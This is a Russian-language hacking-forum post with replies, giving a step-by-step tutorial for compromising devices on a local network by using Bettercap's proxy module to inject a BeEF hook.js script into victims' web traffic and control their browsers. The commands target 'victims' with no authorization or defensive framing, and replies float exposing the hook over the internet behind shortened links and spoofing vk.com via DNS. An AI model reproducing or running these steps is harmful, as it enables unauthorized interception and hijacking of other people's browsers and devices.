Взламываем устройства в сети с помощью Bettercap и BeEF

Watchiz · 13 окт 2017

НАЧАЛО

Для начало нам нужно установить Bettercap, пишем следующие команды :
apt-get update
apt-get dist-upgrade
apt-get install bettercap

Код
apt-get update

apt-get dist-upgrade

apt-get install bettercap
НАСТРАИВАЕМ

После этого запускаем BeEF Xss Framework

Дальше у нас откроется вот такой терминал:

Тыкаем на ссылку под названием "UI URL" и логинимся. Пароль и логин: beef.
Теперь нам надо узнать наш внутренний IP. Пишим ifconfig. В моем случае у меня IP 192.168.100.4.
Для чего мы узнавали наш IP?
Для того чтобы мы настроили ссылку на наш HOOK.
Как видите на терминале с BeEF показан пример ссылки с HOOK и вместо <IP> подставляем наш IP.
HOOK - это JS скрипт дающий нам доступ к устройству.

Ну а теперь когда мы поняли что такое HOOK, давайте заражать устройства.
В этом нам пожет Bettercap. Запускаем его вот с такими параметрами:
bettercap --proxy --proxy-module injectjs --js-url "192.168.100.4:3000/hook.js"

Код
bettercap --proxy --proxy-module injectjs --js-url "192.168.100.4:3000/hook.js"
Обьясню какие параметры за что отвечают:

Отвечает за использование ****** для обхода SSL сертификата.
--proxy

Код
--proxy
Этот модуль отвечает за инджект скрипта в жертву.
--proxy-module injectjs

Код
--proxy-module injectjs
А это уже ссылка на наш HOOK.
--js-url "192.168.100.4:3000/hook.js

Код
--js-url "192.168.100.4:3000/hook.js
ЗАХВАТ ЖЕРТВ

Теперь мы ждем, когда жертва(ы) зайдут на какю-нибудь страницу.
!!! ПРОШУ ЗАМЕТИТЬ, ЕСЛИ ЖЕРТВА ЗАКРОЕТ СТРАНИЦУ СО СКРИПТОМ МЫ ПОТЕРЯЕМ ДОСТУП, НО ЕСЛИ ОНА ОТКРОЕТ ДРУГУЮ ТО СКРИПТ ВЕРНЕТСЯ !!!

Переходим на панель BeEF.

Ну а дальше сами делаем, если хотите могу запилить тему по этой программе. Но это в другой раз!

А на этом я прощаюсь с вами был WATCHIZ.

#моястатья

kelly13 · 12 мар 2018

Вот мне все любопытно, проканает ли если пробросить нужную переадресацию в роутере.
Что бы скрипт ломился на WAN а роутер уже давал на внутренний IP:PORT

Watchiz · 13 мар 2018

kelly13, можно ли по подробнее?

Watchiz · 13 мар 2018

@RareHoneyBauger, неуверен. Termux та ещё дичь.

kelly13 · 14 мар 2018

Watchiz kelly13, можно ли по подробнее?
Нажмите, чтобы раскрыть...

Могу конечно ошибаться, но в моей голове это выглядит так:
К примеру имеем внешний белый IP 1.2.3.4 и серый 192.168.0.1
Как видно, указано в статье что используется порт 3000, следовательно в роутере прописываем маршрут соединений с 1.2.3.4:3000 go to > 192.168.0.1:3000
В случае если бы такой маршрут прокатил бы, то мы имеем возможность в строке (из кода автора поста)
[B]192.168.100.4:3000/ hook.js[/B]

Код
[B]192.168.100.4:3000/ hook.js[/B]
заменить свой внешник 1.2.3.4:3000/ hook.js, в свою очередь сам маршрутизатор должен адресовать соединение на тот же 192.168.0.1:3000.
В таком исполнении можно уже подсовывать людям чуть ли не ВК сократив все на vk .cc или goo. gl

По логике должно сработать собственно, но к сожалению не пробовал и эта мысль родилась буквально за 2 минуты, прошу не ругать сильно. Если я что-то не учел (а скорее всего так и есть, то просьба указать на ошибки.:wink3:

Watchiz · 14 мар 2018

kelly13, Не уверен что сработает.

kelly13 · 15 мар 2018

Watchiz kelly13, Не уверен что сработает.
Нажмите, чтобы раскрыть...

Да и я впрочем то тоже не уверен.
Но эта так скажем теория не лишена логики.
Что-ж. Постараюсь проверить как только с работой разгребусь. Отпишусь если что.

0ralo · 16 мар 2018

Это работает с хттпС

kelly13 · 16 мар 2018

0ralo Это работает с хттпС
Нажмите, чтобы раскрыть...

с HTTPS еще более сомнительный вопрос ибо в связке kali>роутер>жертва не думаю что уместен будет сам сертификат.

Ser0o0p · 29 июл 2018

Помогите у меня ошибка flag provided but not defined: -proxy
Usage of bettercap:

Watchiz · 29 июл 2018

Ser0o0p Помогите у меня ошибка flag provided but not defined: -proxy
Usage of bettercap:
Нажмите, чтобы раскрыть...

Почитай FAQ к bettercap. Он знатно обновился.

Ser0o0p · 29 июл 2018

Типа уже так зделать нельзя?

Watchiz · 29 июл 2018

Ser0o0p Типа уже так зделать нельзя?
Нажмите, чтобы раскрыть...

Можно, просто почитай FAQ к нему)

Ser0o0p · 29 июл 2018

Вот читаю и одно и тоже самое https://hackware.ru/?p=1100

Ser0o0p · 29 июл 2018

Cкиньте кто то FAQ к bettercap а то я не понимаю где новая инфа, жму в kali linux bettercap --help фигня

Watchiz · 29 июл 2018

Ser0o0p Cкиньте кто то FAQ к bettercap а то я не понимаю где новая инфа, жму в kali linux bettercap --help фигня
Нажмите, чтобы раскрыть...

https://github.com/bettercap/bettercap/wiki

Ser0o0p · 29 июл 2018

спасибо

LiqBz · 31 июл 2018

Ребят, вот тоже стало интересно. У меня есть доступ к роутеру и есть ли возможность подмены DNS так, чтобы мой localhost, отображался как vk.com?

Sincerest · 6 авг 2018

Годный тутор, надо попробовать!

Форк бомба на Linux.

Есть статьи по maltego?

Пробиваем людей по номеру

Гейминг на Linux: миф или реальность?

Подглядываем за чужой вебкой [Kali Linux]

Разведка для pentesta | принципы разведки | инструменты для разведки

****им RDP, SSH, VNC с помощью Crowbar

Как поиграть в игры на linux лёгкий способ

КАК ХАЦНУТЬ wi-fi?

Базовая информация по сетевому взаимодействию

Установка kali linux на android (termux)

Как установить Kali Linux на флешку с сохранением и без + переходом Gnub ? Мини-Гайд

Взлом ПК с помощью GIF

Взламываем сайты за 5 минут [ Kali Linux ]

Взлом любого телефона Android за пару минут

Создание бэкдора HTTP-сервера Apache

Базовая эскалация привелегий (PrivEsc)

Браузер в консоли Linux

Среда Kali Nethunter в Termux (Перезалив)

[ Kali Linux ] Роняем сайты c помощью "Xerses"

Площадки по пентесту в 2024 году

Взлом Андроид телефона

Взлом Android с помощью Kali (Удаленно)

Решение проблемы подключения ардуино к Ubuntu

Быстрый анализатор ссылок PIDRILA (лучше чем Dirb)

Memcrashed ddos termux

Инструкция по использованию Wifite

Инструменты Kali Linux: мощь тестирования и безопасности (Новичкам)

Установка Python нужной версии на Kali Linux

Взлом/перебор логин-панелей Wordpress

Взламываем устройства в сети с помощью Bettercap и BeEF